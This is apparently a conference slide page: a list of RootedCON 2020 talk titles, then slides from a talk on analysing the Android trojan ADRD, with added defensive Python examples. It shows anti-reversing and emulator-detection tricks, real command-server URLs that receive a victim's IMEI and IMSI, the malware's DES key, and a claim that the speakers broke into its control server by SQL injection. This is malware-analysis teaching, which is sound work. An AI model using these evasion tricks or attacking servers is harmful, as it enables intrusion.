Rooted2020 legalidad de-la_prueba_tecnologica_indiciaria_cuando_tu_papi_es_un...
Rooted2020 legalidad de-la_prueba_tecnologica_indiciaria_cuando_tu_papi_es_un...Rooted2020 legalidad de-la_prueba_tecnologica_indiciaria_cuando_tu_papi_es_un...
Rooted2020 legalidad de-la_prueba_tecnologica_indiciaria_cuando_tu_papi_es_un...RootedCON
 
Rooted2020 hackeando el-mundo_exterior_a_traves_de_bluetooth_low-energy_ble_-...
Rooted2020 hackeando el-mundo_exterior_a_traves_de_bluetooth_low-energy_ble_-...Rooted2020 hackeando el-mundo_exterior_a_traves_de_bluetooth_low-energy_ble_-...
Rooted2020 hackeando el-mundo_exterior_a_traves_de_bluetooth_low-energy_ble_-...RootedCON
 
Rooted2020 evading deep-learning_malware_detectors_-_javier_yuste
Rooted2020 evading deep-learning_malware_detectors_-_javier_yusteRooted2020 evading deep-learning_malware_detectors_-_javier_yuste
Rooted2020 evading deep-learning_malware_detectors_-_javier_yusteRootedCON
 
Rooted2020 encontrando 0days-en_2020_-_antonio_morales
Rooted2020 encontrando 0days-en_2020_-_antonio_moralesRooted2020 encontrando 0days-en_2020_-_antonio_morales
Rooted2020 encontrando 0days-en_2020_-_antonio_moralesRootedCON
 

More from RootedCON (20)

Rooted2020 A clockwork pentester - Jose Carlos Moral & Alvaro Villaverde
Rooted2020 A clockwork pentester - Jose Carlos Moral & Alvaro VillaverdeRooted2020 A clockwork pentester - Jose Carlos Moral & Alvaro Villaverde
Rooted2020 A clockwork pentester - Jose Carlos Moral & Alvaro Villaverde
 
rooted2020 Sandbox fingerprinting -_evadiendo_entornos_de_analisis_-_victor_c...
rooted2020 Sandbox fingerprinting -_evadiendo_entornos_de_analisis_-_victor_c...rooted2020 Sandbox fingerprinting -_evadiendo_entornos_de_analisis_-_victor_c...
rooted2020 Sandbox fingerprinting -_evadiendo_entornos_de_analisis_-_victor_c...
 
Rooted2020 hunting malware-using_process_behavior-roberto_amado
Rooted2020 hunting malware-using_process_behavior-roberto_amadoRooted2020 hunting malware-using_process_behavior-roberto_amado
Rooted2020 hunting malware-using_process_behavior-roberto_amado
 
Rooted2020 compliance as-code_-_guillermo_obispo_-_jose_mariaperez_-_
Rooted2020 compliance as-code_-_guillermo_obispo_-_jose_mariaperez_-_Rooted2020 compliance as-code_-_guillermo_obispo_-_jose_mariaperez_-_
Rooted2020 compliance as-code_-_guillermo_obispo_-_jose_mariaperez_-_
 
Rooted2020 the day i_ruled_the_world_deceiving_software_developers_through_op...
Rooted2020 the day i_ruled_the_world_deceiving_software_developers_through_op...Rooted2020 the day i_ruled_the_world_deceiving_software_developers_through_op...
Rooted2020 the day i_ruled_the_world_deceiving_software_developers_through_op...
 
Rooted2020 si la-empresa_ha_ocultado_el_ciberataque,_como_se_ha_enterado_el_r...
Rooted2020 si la-empresa_ha_ocultado_el_ciberataque,_como_se_ha_enterado_el_r...Rooted2020 si la-empresa_ha_ocultado_el_ciberataque,_como_se_ha_enterado_el_r...
Rooted2020 si la-empresa_ha_ocultado_el_ciberataque,_como_se_ha_enterado_el_r...
 
Rooted2020 wordpress-another_terror_story_-_manuel_garcia_-_jacinto_sergio_ca...
Rooted2020 wordpress-another_terror_story_-_manuel_garcia_-_jacinto_sergio_ca...Rooted2020 wordpress-another_terror_story_-_manuel_garcia_-_jacinto_sergio_ca...
Rooted2020 wordpress-another_terror_story_-_manuel_garcia_-_jacinto_sergio_ca...
 
Rooted2020 Atacando comunicaciones-de_voz_cifradas_-_jose_luis_verdeguer
Rooted2020 Atacando comunicaciones-de_voz_cifradas_-_jose_luis_verdeguerRooted2020 Atacando comunicaciones-de_voz_cifradas_-_jose_luis_verdeguer
Rooted2020 Atacando comunicaciones-de_voz_cifradas_-_jose_luis_verdeguer
 
rooted2020-Rootkit necurs no_es_un_bug,_es_una_feature_-_roberto_santos_-_jav...
rooted2020-Rootkit necurs no_es_un_bug,_es_una_feature_-_roberto_santos_-_jav...rooted2020-Rootkit necurs no_es_un_bug,_es_una_feature_-_roberto_santos_-_jav...
rooted2020-Rootkit necurs no_es_un_bug,_es_una_feature_-_roberto_santos_-_jav...
 
Rooted2020 stefano maccaglia--_the_enemy_of_my_enemy
Rooted2020 stefano maccaglia--_the_enemy_of_my_enemyRooted2020 stefano maccaglia--_the_enemy_of_my_enemy
Rooted2020 stefano maccaglia--_the_enemy_of_my_enemy
 
Rooted2020 taller de-reversing_de_binarios_escritos_en_golang_-_mariano_palom...
Rooted2020 taller de-reversing_de_binarios_escritos_en_golang_-_mariano_palom...Rooted2020 taller de-reversing_de_binarios_escritos_en_golang_-_mariano_palom...
Rooted2020 taller de-reversing_de_binarios_escritos_en_golang_-_mariano_palom...
 
Rooted2020 virtual pwned-network_-_manel_molina
Rooted2020 virtual pwned-network_-_manel_molinaRooted2020 virtual pwned-network_-_manel_molina
Rooted2020 virtual pwned-network_-_manel_molina
 
Rooted2020 van a-mear_sangre_como_hacer_que_los_malos_lo_paguen_muy_caro_-_an...
Rooted2020 van a-mear_sangre_como_hacer_que_los_malos_lo_paguen_muy_caro_-_an...Rooted2020 van a-mear_sangre_como_hacer_que_los_malos_lo_paguen_muy_caro_-_an...
Rooted2020 van a-mear_sangre_como_hacer_que_los_malos_lo_paguen_muy_caro_-_an...
 
Rooted2020 todo a-siem_-_marta_lopez
Rooted2020 todo a-siem_-_marta_lopezRooted2020 todo a-siem_-_marta_lopez
Rooted2020 todo a-siem_-_marta_lopez
 
Rooted2020 roapt evil-mass_storage_-_tu-ya_aqui_-_david_reguera_-_abel_valero
Rooted2020 roapt evil-mass_storage_-_tu-ya_aqui_-_david_reguera_-_abel_valeroRooted2020 roapt evil-mass_storage_-_tu-ya_aqui_-_david_reguera_-_abel_valero
Rooted2020 roapt evil-mass_storage_-_tu-ya_aqui_-_david_reguera_-_abel_valero
 
Rooted2020 live coding--_jesus_jara
Rooted2020 live coding--_jesus_jaraRooted2020 live coding--_jesus_jara
Rooted2020 live coding--_jesus_jara
 
Rooted2020 legalidad de-la_prueba_tecnologica_indiciaria_cuando_tu_papi_es_un...
Rooted2020 legalidad de-la_prueba_tecnologica_indiciaria_cuando_tu_papi_es_un...Rooted2020 legalidad de-la_prueba_tecnologica_indiciaria_cuando_tu_papi_es_un...
Rooted2020 legalidad de-la_prueba_tecnologica_indiciaria_cuando_tu_papi_es_un...
 
Rooted2020 hackeando el-mundo_exterior_a_traves_de_bluetooth_low-energy_ble_-...
Rooted2020 hackeando el-mundo_exterior_a_traves_de_bluetooth_low-energy_ble_-...Rooted2020 hackeando el-mundo_exterior_a_traves_de_bluetooth_low-energy_ble_-...
Rooted2020 hackeando el-mundo_exterior_a_traves_de_bluetooth_low-energy_ble_-...
 
Rooted2020 evading deep-learning_malware_detectors_-_javier_yuste
Rooted2020 evading deep-learning_malware_detectors_-_javier_yusteRooted2020 evading deep-learning_malware_detectors_-_javier_yuste
Rooted2020 evading deep-learning_malware_detectors_-_javier_yuste
 
Rooted2020 encontrando 0days-en_2020_-_antonio_morales
Rooted2020 encontrando 0days-en_2020_-_antonio_moralesRooted2020 encontrando 0days-en_2020_-_antonio_morales
Rooted2020 encontrando 0days-en_2020_-_antonio_morales
 

Lost in Translation: Analyzing Malware on Android Phones

  • 1. ! Lost in translation WTF is happening inside my Android Phone Ok Cancel
  • 2. 8:30 PM Contents: Android System, Static Analysis, Dynamic Analysis, Reversing, Red Bunny, Conclusion
  • 4. Dalvik VM
    - Register-based virtual machine.
    - It uses its own bytecode, not Java bytecode.
    - Runs on a slow CPU with little RAM.
    - Runs on an operating system without swap space.
    - Optimized for memory efficiency.
    - Dex class file format.
  • 5. Dex file format (sections in file order): header, string_ids, type_ids, proto_ids, field_ids, method_ids, class_defs, data
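To make the section table concrete, here is an added Python example (not code from the talk or from any tool it names) that parses the 0x70-byte dex header into the sections listed on the slide, verifies the Adler-32 checksum and SHA-1 signature that the header carries, and follows string_ids into the data section. The tiny dex it parses is constructed inside the block (header, string_ids and string data only, no map_list); the field order and the checksum/signature coverage follow the dex format specification.

```python
import hashlib
import struct
import zlib

# dex header layout (0x70 bytes), in the order given by the dex format spec:
# magic, checksum, signature, file_size, header_size, endian_tag, link_size,
# link_off, map_off, then (size, off) pairs for the seven sections on the slide.
DEX_HEADER = struct.Struct("<8sI20s" + "I" * 20)
SECTIONS = ("string_ids", "type_ids", "proto_ids", "field_ids",
            "method_ids", "class_defs", "data")
ENDIAN_CONSTANT = 0x12345678


def parse_header(blob):
    """Decode the header into a dict; raises ValueError on a malformed header."""
    if len(blob) < DEX_HEADER.size:
        raise ValueError("file shorter than a dex header")
    f = DEX_HEADER.unpack_from(blob, 0)
    magic = f[0]
    if magic[:4] != b"dex\n" or magic[7:] != b"\0":
        raise ValueError("bad magic %r" % magic)
    if f[5] != ENDIAN_CONSTANT:
        raise ValueError("unexpected endian_tag 0x%08x" % f[5])
    header = {"version": magic[4:7].decode(), "checksum": f[1], "signature": f[2],
              "file_size": f[3], "header_size": f[4], "map_off": f[8]}
    for i, name in enumerate(SECTIONS):
        header[name] = {"size": f[9 + 2 * i], "off": f[10 + 2 * i]}
    return header


def verify_integrity(blob, header):
    """checksum covers everything after itself (offset 12); signature everything after itself (offset 32)."""
    return {
        "checksum": (zlib.adler32(blob[12:]) & 0xFFFFFFFF) == header["checksum"],
        "signature": hashlib.sha1(blob[32:]).digest() == header["signature"],
        "file_size": len(blob) == header["file_size"],
    }


def read_uleb128(blob, off):
    result = shift = 0
    while True:
        b = blob[off]
        off += 1
        result |= (b & 0x7F) << shift
        if not b & 0x80:
            return result, off
        shift += 7


def read_strings(blob, header):
    """Follow each string_id_item (uint offset) to its string_data_item: uleb128 utf16_size, MUTF-8 bytes, NUL."""
    sec = header["string_ids"]
    strings = []
    for i in range(sec["size"]):
        data_off, = struct.unpack_from("<I", blob, sec["off"] + 4 * i)
        _utf16_size, pos = read_uleb128(blob, data_off)
        end = blob.index(b"\0", pos)
        strings.append(blob[pos:end].decode("utf-8"))  # MUTF-8 equals UTF-8 for ASCII
    return strings


def build_sample_dex(strings):
    """Constructed minimal dex (header + string_ids + string data); not a real app."""
    string_ids_off = DEX_HEADER.size
    data_off = string_ids_off + 4 * len(strings)
    data, ids = bytearray(), []
    for s in strings:
        ids.append(data_off + len(data))
        data += bytes([len(s)]) + s.encode("utf-8") + b"\0"  # ASCII strings shorter than 128 chars
    body = struct.pack("<%dI" % len(ids), *ids) + bytes(data)
    file_size = DEX_HEADER.size + len(body)

    def header(checksum, signature):
        return DEX_HEADER.pack(
            b"dex\n035\0", checksum, signature, file_size, DEX_HEADER.size,
            ENDIAN_CONSTANT, 0, 0, 0,          # link_size, link_off, map_off (no map_list here)
            len(strings), string_ids_off,      # string_ids
            0, 0, 0, 0, 0, 0, 0, 0, 0, 0,      # type/proto/field/method ids, class_defs
            len(data), data_off)               # data

    unsigned = header(0, b"\0" * 20) + body
    signature = hashlib.sha1(unsigned[32:]).digest()
    signed = header(0, signature) + body
    checksum = zlib.adler32(signed[12:]) & 0xFFFFFFFF
    return header(checksum, signature) + body


if __name__ == "__main__":
    dex = build_sample_dex(["Lcom/example/Foo;", "getDeviceId"])
    hdr = parse_header(dex)
    print(hdr["version"], {n: hdr[n] for n in SECTIONS})
    print(verify_integrity(dex, hdr), read_strings(dex, hdr))
```

A header that parses but fails the checksum or signature check is worth a second look before any other tool is pointed at the file: dalvikvm recomputes both on load, so a sample whose header has been edited by hand (the kind of tampering the anti-analysis slide describes) shows up here first.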
  • 6. Analysis environment. Tools: a case-sensitive file system :D, Android SDK, Android NDK, Android source code, Eclipse, Apktool, dex2jar, JD-GUI, Android Emulator
  • 7. Example toolchain: .java (source) -> compiler -> .dex (dexdump); .dex -> dex2jar -> .java (JD-GUI); .dex -> baksmali -> .smali
  • 8. Anti-analysis. Examples:
    - Easy: use a.class and A.class as class names: the file will be hidden on case-insensitive file systems.
    - Medium: optimize/obfuscate the code with ProGuard.
    - Hard: modify bytecode to break reversing tools (be sure that it still runs on Dalvik). E.g. androguard-a1:
        if self.__value_type >= VALUE_SHORT
        ...
        elif self.__value_type == VALUE_ARRAY :
        ...
        elif self.__value_type == VALUE_BYTE :
        ...
        elif self.__value_type == VALUE_NULL :
        ...
        elif self.__value_type == VALUE_BOOLEAN :
        ...
        else :
            raise("oops")
      Insert the value type VALUE_ANNOTATION, which none of the branches handles, and the tool ends in the final else.
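The "Hard" item works because the tool's type switch ends in a bare raise. As an added Python example (not androguard's code, and not from the talk), here is a decoder for dex encoded_value items that covers the value types named on the slide plus VALUE_ANNOTATION, and that reports an unknown or truncated tag together with its offset instead of aborting the whole analysis. The tag numbers follow the dex format specification; the sample bytes are constructed.

```python
import struct

# value_type tags from the dex format spec: low 5 bits of the first byte; the
# high 3 bits are value_arg (size - 1 for numbers and indices, the value for BOOLEAN)
VALUE_BYTE, VALUE_SHORT, VALUE_CHAR, VALUE_INT, VALUE_LONG = 0x00, 0x02, 0x03, 0x04, 0x06
VALUE_FLOAT, VALUE_DOUBLE = 0x10, 0x11
VALUE_METHOD_TYPE, VALUE_METHOD_HANDLE = 0x15, 0x16
VALUE_STRING, VALUE_TYPE, VALUE_FIELD, VALUE_METHOD, VALUE_ENUM = 0x17, 0x18, 0x19, 0x1A, 0x1B
VALUE_ARRAY, VALUE_ANNOTATION, VALUE_NULL, VALUE_BOOLEAN = 0x1C, 0x1D, 0x1E, 0x1F

SIGNED = {VALUE_BYTE, VALUE_SHORT, VALUE_INT, VALUE_LONG}
UNSIGNED_INDEX = {VALUE_CHAR, VALUE_METHOD_TYPE, VALUE_METHOD_HANDLE, VALUE_STRING,
                  VALUE_TYPE, VALUE_FIELD, VALUE_METHOD, VALUE_ENUM}


class DexFormatError(ValueError):
    """Malformed or unsupported encoding; the message carries the offset to look at."""


def _take(buf, off, n):
    if off + n > len(buf):
        raise DexFormatError("truncated value at offset %d" % off)
    return buf[off:off + n], off + n


def read_uleb128(buf, off):
    result = shift = 0
    while True:
        chunk, off = _take(buf, off, 1)
        result |= (chunk[0] & 0x7F) << shift
        if not chunk[0] & 0x80:
            return result, off
        shift += 7


def decode_value(buf, off):
    """Decode one encoded_value at off; returns (python value, next offset)."""
    tag, off = _take(buf, off, 1)
    vtype, varg = tag[0] & 0x1F, tag[0] >> 5
    if vtype in SIGNED:
        raw, off = _take(buf, off, varg + 1)
        return int.from_bytes(raw, "little", signed=True), off
    if vtype in UNSIGNED_INDEX:
        raw, off = _take(buf, off, varg + 1)
        return int.from_bytes(raw, "little"), off
    if vtype in (VALUE_FLOAT, VALUE_DOUBLE):
        width, fmt = (4, "<f") if vtype == VALUE_FLOAT else (8, "<d")
        raw, off = _take(buf, off, varg + 1)
        # floats drop their trailing low-order zero bytes; in little-endian order
        # those are the leading bytes, so pad on the left before unpacking
        return struct.unpack(fmt, raw.rjust(width, b"\0"))[0], off
    if vtype == VALUE_BOOLEAN:
        return bool(varg), off
    if vtype == VALUE_NULL:
        return None, off
    if vtype == VALUE_ARRAY:
        count, off = read_uleb128(buf, off)
        items = []
        for _ in range(count):
            item, off = decode_value(buf, off)
            items.append(item)
        return items, off
    if vtype == VALUE_ANNOTATION:
        type_idx, off = read_uleb128(buf, off)
        count, off = read_uleb128(buf, off)
        elements = {}
        for _ in range(count):
            name_idx, off = read_uleb128(buf, off)
            elements[name_idx], off = decode_value(buf, off)
        return {"type_idx": type_idx, "elements": elements}, off
    raise DexFormatError("unknown value_type 0x%02x at offset %d" % (vtype, off - 1))


def decode_all(buf):
    """Decode a run of values; on a bad one, return what was decoded plus a diagnostic."""
    values, off = [], 0
    while off < len(buf):
        try:
            value, off = decode_value(buf, off)
        except DexFormatError as e:
            return values, str(e)
        values.append(value)
    return values, None


# Constructed sample: INT 42, INT -1, BOOLEAN true, STRING idx 7, ARRAY [BYTE 1, BYTE 2],
# ANNOTATION(type 3, {name 5: NULL}), FLOAT 1.0
SAMPLE_VALUES = bytes.fromhex("042a04ff3f17071c0200010002" "1d0301051e" "30803f")
# INT 42 followed by the reserved tag 0x05: the kind of edit the slide describes
SAMPLE_BROKEN = bytes.fromhex("042a0500")

if __name__ == "__main__":
    print(decode_all(SAMPLE_VALUES))
    print(decode_all(SAMPLE_BROKEN))
```

The diagnostic with the offset is what matters for triage: a value the decoder does not understand is itself a finding (either a newer dex feature or a deliberately odd file), and a tool that prints it and keeps the values decoded so far is far more useful than one that stops at "oops".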
  • 9. Dynamic analysis. Basic:
    - Create an Android Virtual Device -> $android (SDK)
    - $emulator -port 5560 @virtual-device -tcpdump capture.pcap
    - $adb install app.apk
    - $adb shell monkey -v -p package.app 700
    - $adb shell logcat -d && $adb shell logcat -b events -d (radio also)
    - $adb shell '/data/busybox find / -type f -exec /data/busybox md5sum
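The last command hashes every file so that a listing taken before installing the app can be compared with one taken after it has run. As an added Python example (not from the talk), this compares two such md5sum listings and separates new, removed and modified paths, skipping pseudo-filesystems that change on their own and the error lines busybox prints for unreadable files. Both listings are constructed (the digests and paths are made up).

```python
NOISE_PREFIXES = ("/proc/", "/sys/", "/dev/")  # pseudo-filesystems change without any app touching them


def parse_md5sum(listing):
    """Turn busybox md5sum output ('<32 hex>  <path>' per line) into {path: digest}; skip error lines."""
    table = {}
    for line in listing.splitlines():
        digest, sep, path = line.strip().partition("  ")
        if not sep or len(digest) != 32 or any(c not in "0123456789abcdef" for c in digest):
            continue  # e.g. "md5sum: can't open ...: Permission denied"
        table[path] = digest
    return table


def diff_snapshots(before, after, ignore=NOISE_PREFIXES):
    """Classify paths as added / removed / modified between two {path: digest} maps."""
    b = {p: h for p, h in before.items() if not p.startswith(ignore)}
    a = {p: h for p, h in after.items() if not p.startswith(ignore)}
    return {
        "added": sorted(set(a) - set(b)),
        "removed": sorted(set(b) - set(a)),
        "modified": sorted(p for p in set(a) & set(b) if a[p] != b[p]),
    }


# Constructed listings standing in for two `find / -type f -exec md5sum` runs
BEFORE = """\
d41d8cd98f00b204e9800998ecf8427e  /data/system/packages.xml
0cc175b9c0f1b6a831c399e269772661  /system/app/Browser.apk
92eb5ffee6ae2fec3ad71c777531578f  /data/misc/wifi/wpa_supplicant.conf
4a8a08f09d37b73795649038408b5f33  /proc/uptime
md5sum: can't open '/proc/1/mem': Permission denied
"""
AFTER = """\
8277e0910d750195b448797616e091ad  /data/system/packages.xml
0cc175b9c0f1b6a831c399e269772661  /system/app/Browser.apk
92eb5ffee6ae2fec3ad71c777531578f  /data/misc/wifi/wpa_supplicant.conf
e1671797c52e15f763380b45e841ec32  /proc/uptime
8fa14cdd754f91cc6554c9e71929cce7  /data/app/com.example.wallpaper-1.apk
45c48cce2e2d7fbdea1afc51c7c6ad26  /data/data/com.example.wallpaper/files/update.apk
"""


def report():
    """Diff the constructed before/after listings."""
    return diff_snapshots(parse_md5sum(BEFORE), parse_md5sum(AFTER))


if __name__ == "__main__":
    for kind, paths in report().items():
        print(kind, paths)
```

In practice the "added" list is where a dropped payload (such as the update apk the later slides describe) shows up, and "modified" catches changes to system state files that the app should have had no business touching.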
  • 10. Make it more real - simulate phone events:
    - Send SMS: $echo sms send +34656566789 test | nc localhost 5554
      Seen in the radio log: D/AT ( 32): AT< 00200b914356566687f900001120720274404004e3f0380c
    - Simulate calls:
      $echo gsm call +34656566789 | nc localhost 5554
      $echo gsm accept +34656566789 | nc localhost 5554
      $echo gsm cancel +34656566789 | nc localhost 5554
    - Change GPS coordinates: $echo geo fix -82.411629 28.054553 | nc localhost 5554
  • 11. Dynamic analysis. Advanced:
    - Create your own system image and modify the Java classes to log the program flow. Example: frameworks/base/core/java/android/os/Process.java
  • 12. Compiling Android kernel modules
    $git clone git://android.git.kernel.org/kernel/common
    $git branch -a
    $git checkout --track -b android-goldfish-2.6.29 origin/android-goldfish-2.6.29
    $adb pull /proc/config.gz ./; gunzip config.gz; mv config .config
    Edit and add CONFIG_MODULES=y (disabled by default on the emulator kernel)
    $emulator -avd armv5y -kernel /tmp/zImage
  • 13. System-call hooking: $grep sys_call_table System.map
  • 14. Anti-VM - detecting the emulator is very easy:
    - DEVICE_ID:
        String id = Settings.Secure.getString(this.getContentResolver(), Settings.Secure.ANDROID_ID);
        boolean emulator = TextUtils.isEmpty(id);
      Solution: change secure->android_id in data/data/com.android.providers.settings/databases/settings.db
    - IMSI:
        TelephonyManager manager = (TelephonyManager) getSystemService(TELEPHONY_SERVICE);
        String imsi = manager.getSubscriberId(); // 00000... on the emulator
      Solution: patch the emulator binary (search for the +CGSN string) or the emulator source code (external/qemu/telephony/android_modem.c).
  • 15. More Anti-VM
    - LocationManager.NETWORK_PROVIDER -> IllegalArgumentException
    - Detect ADB stuff: process, network, debug enabled...
    - /proc/cpuinfo -> Hardware : Goldfish
    - vibrator.vibrate(milliseconds) and use SensorListener (sensor data doesn't change) (thanks Ehooo)
    - QEMU-specific detection (Google)
    Solution: patch the emulator, QEMU, system hooking...
  • 16. Alternatives to the Android Emulator:
    - http://www.android-x86.org/ (supports VMware)
    - Use a real phone... slower
  • 17. Attack vectors:
    - Alternative markets, repacked applications.
    - SMS, MMS vulnerabilities, fuzzing!!!
    - Wireless, Bluetooth drivers
    - NFC
    - System components: WebKit, sound library, kernel.
  • 18. Third-party software. Source: http://android.git.kernel.org/
  • 19. ADRD aka Redbunny
    - "Security Alert 2011-02-14: New Android Trojan 'ADRD' Was Found in the Wild by Aegislab" (http://blog.aegislab.com/index.php?op=ViewArticle&articleId=75&blogId=1)
    - "[…] Today, we found a new Android trojan, we call it "ADRD", which was not reported by any security vendors before. […]"
    - Jaime Blasco and Pablo Rincón were working together, analyzing this malware on Feb 2, 2011:
      * Name: com.beautyfullivewallpaper
      * Date: Feb. 2, 2011, 1:49 p.m.
    - Also known as HongTouTou
  • 20. Detection
    - Permission list:
      * INTERNET, WRITE_EXTERNAL_STORAGE, ACCESS_NETWORK_STATE, READ_PHONE_STATE, RECEIVE_BOOT_COMPLETED, MODIFY_PHONE_STATE, WRITE_APN_SETTINGS...
    - Cipher module/library calls (DES):
      * init  Ljavax/crypto/Cipher;  Lcom/xxx/yyy/ddda;  decrypt
    - Function calls to retrieve the IMSI/IMEI codes:
      * IMEI: getDeviceId  Lcom/xxx/yyy/MyService;  onCreate
      * IMSI: getSubscriberId  Lcom/xxx/yyy/MyService;  onCreate
    - HTTP requests (GET and POST):
      * String str8 = "http://adrd.taxuan.net/index.aspx?im=" + (String)localObject;
      * adrd.xiaxiab.com  POST  /index.aspx?im=82a68757db94a88dace3e401a5721b33af757f73d68485eab1244e5dace3ed65910991f4dbd438af
  • 21. Detection
    - Sends HTTP requests through a proxy:
      * HttpHost localHttpHost = new HttpHost("10.0.0.172", 80, "http");
      * HttpParams localHttpParams = localDefaultHttpClient.getParams().setParameter("http.route.default-proxy", localHttpHost);
    - Services:
      * com.xxx.yyy.MyService
      * .beauty.Beauty
    - Intents:
      * android.intent.action.BOOT_COMPLETED **** -> boots at system startup
      * android.intent.action.PHONE_STATE
      * android.net.conn.CONNECTIVITY_CHANGE
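The two detection slides list indicators at three levels: the permission set in the manifest, the boot receiver, and the IMEI/IMSI, DES and proxy calls in the code. As an added Python example (not from the talk), here is a small static triage pass over an apktool-decoded AndroidManifest.xml and baksmali output that looks for exactly those indicators and keeps the matching lines for the analyst. The manifest and smali fragments are constructed; the C&C URL string in them is the one shown on slide 20, the package and class names are made up, and the "three or more permissions" threshold is a choice of this example, not a rule from the talk.

```python
import re
import xml.etree.ElementTree as ET

ANDROID_NS = "{http://schemas.android.com/apk/res/android}"

# Permissions the slide lists for ADRD; three or more of them together count as one indicator
ADRD_PERMISSIONS = {
    "android.permission." + p
    for p in ("INTERNET", "WRITE_EXTERNAL_STORAGE", "ACCESS_NETWORK_STATE",
              "READ_PHONE_STATE", "RECEIVE_BOOT_COMPLETED", "MODIFY_PHONE_STATE",
              "WRITE_APN_SETTINGS")
}
BOOT_ACTION = "android.intent.action.BOOT_COMPLETED"

# baksmali-level patterns for the calls and strings the slides point at
SMALI_PATTERNS = {
    "reads IMEI": re.compile(r"Landroid/telephony/TelephonyManager;->getDeviceId\("),
    "reads IMSI": re.compile(r"Landroid/telephony/TelephonyManager;->getSubscriberId\("),
    "uses javax.crypto.Cipher": re.compile(r"Ljavax/crypto/Cipher;->(getInstance|init|doFinal)\("),
    "DES cipher string": re.compile(r'const-string [vp]\d+, "DES[/"]'),
    "sets default HTTP proxy": re.compile(r'"http\.route\.default-proxy"'),
    "hard-coded URL": re.compile(r'const-string [vp]\d+, "https?://[^"]+"'),
}


def manifest_indicators(xml_text):
    """Indicators from an apktool-decoded AndroidManifest.xml: permission set and boot receivers."""
    root = ET.fromstring(xml_text)
    hits = {}
    perms = {e.get(ANDROID_NS + "name") for e in root.iter("uses-permission")}
    found = sorted(perms & ADRD_PERMISSIONS)
    if len(found) >= 3:
        hits["ADRD-like permission set"] = found
    boot = [r.get(ANDROID_NS + "name") for r in root.iter("receiver")
            if any(a.get(ANDROID_NS + "name") == BOOT_ACTION for a in r.iter("action"))]
    if boot:
        hits["starts at boot"] = boot
    return hits


def smali_indicators(smali_text):
    """Indicators from baksmali output; each hit keeps the lines that matched."""
    hits = {}
    for line in smali_text.splitlines():
        for name, pattern in SMALI_PATTERNS.items():
            if pattern.search(line):
                hits.setdefault(name, []).append(line.strip())
    return hits


def triage(manifest_xml, smali_text):
    """Combine both sources; the score is simply the number of distinct indicators hit."""
    m, s = manifest_indicators(manifest_xml), smali_indicators(smali_text)
    return {"manifest": m, "smali": s, "score": len(m) + len(s)}


# Constructed inputs modelled on the slides (package and class names are made up)
SAMPLE_MANIFEST = """\
<manifest xmlns:android="http://schemas.android.com/apk/res/android" package="com.example.wallpaper">
  <uses-permission android:name="android.permission.INTERNET"/>
  <uses-permission android:name="android.permission.READ_PHONE_STATE"/>
  <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED"/>
  <uses-permission android:name="android.permission.WRITE_APN_SETTINGS"/>
  <application>
    <service android:name=".MyService"/>
    <receiver android:name=".BootReceiver">
      <intent-filter><action android:name="android.intent.action.BOOT_COMPLETED"/></intent-filter>
    </receiver>
  </application>
</manifest>
"""
SAMPLE_SMALI = """\
.method public onCreate()V
    const-string v0, "phone"
    invoke-virtual {p0, v0}, Lcom/example/wallpaper/MyService;->getSystemService(Ljava/lang/String;)Ljava/lang/Object;
    invoke-virtual {v0}, Landroid/telephony/TelephonyManager;->getDeviceId()Ljava/lang/String;
    invoke-virtual {v0}, Landroid/telephony/TelephonyManager;->getSubscriberId()Ljava/lang/String;
    const-string v1, "DES/CBC/PKCS5Padding"
    invoke-static {v1}, Ljavax/crypto/Cipher;->getInstance(Ljava/lang/String;)Ljavax/crypto/Cipher;
    const-string v2, "http://adrd.taxuan.net/index.aspx?im="
    const-string v3, "http.route.default-proxy"
.end method
"""
BENIGN_MANIFEST = """\
<manifest xmlns:android="http://schemas.android.com/apk/res/android" package="com.example.notes">
  <uses-permission android:name="android.permission.INTERNET"/>
  <application><activity android:name=".MainActivity"/></application>
</manifest>
"""
BENIGN_SMALI = """\
.method public onCreate(Landroid/os/Bundle;)V
    invoke-super {p0, p1}, Landroid/app/Activity;->onCreate(Landroid/os/Bundle;)V
    return-void
.end method
"""

if __name__ == "__main__":
    print("sample", triage(SAMPLE_MANIFEST, SAMPLE_SMALI))
    print("benign", triage(BENIGN_MANIFEST, BENIGN_SMALI))
```

None of these indicators is damning on its own (a legitimate app may read the IMEI or use DES), which is why the result keeps the evidence lines rather than a verdict: the combination of a boot receiver, phone identifiers, a cipher and a hard-coded server in one service is what the talk used to recognise the family.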
  • 22. Analysis I
    Service module (MyService):
    1. Sets a proxy for GET/POST and specially crafted HTTP headers (UA, MIME types).
       - Sets the preferred APN.
       - Runs every 12 hours.
       - Looks for a specific APN network: "CMWAP" || "UNIWAP".
    2. Cipher data module: public static String encrypt/decrypt
       Cipher localCipher = Cipher.getInstance("DES/CBC/PKCS5Padding");
    3. Sends data to adrd.taxuan.net/index.aspx?im=%s: IMEI + IMSI + Netway (preferred APN) + iversion + oversion
    4. Loop: decrypt the response, Switch(cmd) (it depends on the …):
       + 0: do nothing
       + 1: adad.StartGo()
       + 2: ParseO
       + 3: UpdateHelper()
    5. adad.StartGo(): sends http://adrd.xiaxiab.com/pic.aspx?im= + encrypt(IMEI+IMSI) and parses the big list of urls/referers, e.g. B#1#963a_w1|http://59.173.12.105/g/g.ashx?w=963a_w1
       UpdateHelper installs the update apk.
    6. BBBB.Go() -> retrieves search lists from wap.baidu.com. FixUrls(): sends random requests adding BAIDU_WISE_UID and HTTP_HEADERS. ParseO(): parses the server response (number, flags, tags...) and sends log data to the control servers, e.g. T213607170863|12345|+ -10086+ abc -597| [ '
  • 23. Analysis II
    - Following the encryption routines, the DES key is found: this.kk = "48734154";
    - UpdateHelper class:
        public class UpdateHelper {
            private static String savefilepath = "/myupdate.apk";
            private Context ct;
            private int netway;
    - Benefit: from visits to the content (Baidu) and bandwidth consumption (China Mobile && Unicom) and also SMS charges.
    - Server URLs (there are more):
        http://adrd.xiaxiab.com/pic.aspx?im=CIPHERED_DATA
        http://adrd.taxuan.net/index.aspx?im=CIPHERED_DATA
    - We want to know more!!
  • 24. Control servers
    - adrd.xiaxiab.com from an eagle view:
      * Microsoft-IIS/6.0
      * Debug enabled (displaying .NET errors and backtraces)
      * Hidden paths to the .NET/aspx application
      * ALL is Chinese! (WTF!?!"·$%&/(?)
    - Possible attack vectors:
      * HTTP functions + DES key + pyDes = "legal" HTTP requests (at least for the adrd server)
  • 25. Control servers - first results:
    * Exceptions in Chinese. Google Translate is your friend.
    * Errors at .NET (it didn't generate any HTML list/table or view to use for data display)
    * We got a successful SQL injection after the last ciphered parameter :D)
    * User without admin privileges.
    * Permissions to run backups + shared resources = timeout
